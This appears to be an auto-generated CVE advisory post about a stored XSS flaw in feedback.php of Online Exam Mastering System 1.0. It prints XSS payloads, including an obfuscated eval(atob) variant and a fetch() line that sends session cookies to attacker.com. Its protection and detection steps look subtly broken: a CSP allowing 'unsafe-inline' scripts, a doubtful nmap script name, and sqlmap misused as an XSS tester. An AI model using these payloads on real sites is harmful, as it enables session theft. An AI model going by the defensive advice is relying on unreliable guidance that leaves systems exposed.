Listen to this Post
How the CVE Works:
CVE-2025-28121 is a stored Cross-Site Scripting (XSS) vulnerability in `feedback.php` of the Online Exam Mastering System 1.0. The flaw exists due to improper sanitization of the `q` parameter, which allows attackers to inject malicious JavaScript payloads. When an admin or user views the feedback section, the payload executes in their browser, enabling session hijacking, defacement, or remote code execution. The attack requires no authentication, making it critical.
DailyCVE Form:
Platform: code-projects
Version: 1.0
Vulnerability: Stored XSS
Severity: Critical
Date: 04/24/2025
What Undercode Say:
Exploitation:
1. Craft a malicious URL or form submission:
http://example.com/feedback.php?q=<script>alert(document.cookie)</script>
2. Use obfuscation to bypass filters:
<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycp'))>
3. Exfiltrate admin cookies via XSS:
fetch('https://attacker.com/steal?data='+document.cookie);
Protection:
1. Sanitize `q` parameter with PHP’s `htmlspecialchars()`:
$q = htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
2. Implement Content Security Policy (CSP):
Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline'
3. Use HTTP-only cookies:
ini_set("session.cookie_httponly", 1);
Detection:
1. Scan with `nmap` for vulnerable endpoints:
nmap -p 80 --script http-xss-spider <target>
2. Automated testing with `sqlmap`:
sqlmap -u "http://example.com/feedback.php?q=test" --eval="alert(1)"
Mitigation:
- Patch `feedback.php` to validate input via regex:
if (!preg_match("/^[a-zA-Z0-9\s]+$/", $_GET['q'])) { die("Invalid input"); } - Deploy WAF rules to block XSS patterns:
location ~ .php$ { modsecurity_rules 'SecRule ARGS "@detectXSS" deny'; }
Analytics:
- Attack Vector: Network (Low Complexity)
- Impact: Confidentiality (High), Integrity (High)
- CVSS 4.0 Score: 9.6 (Critical)
- Exploitability: No Privileges Required
End of Report.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
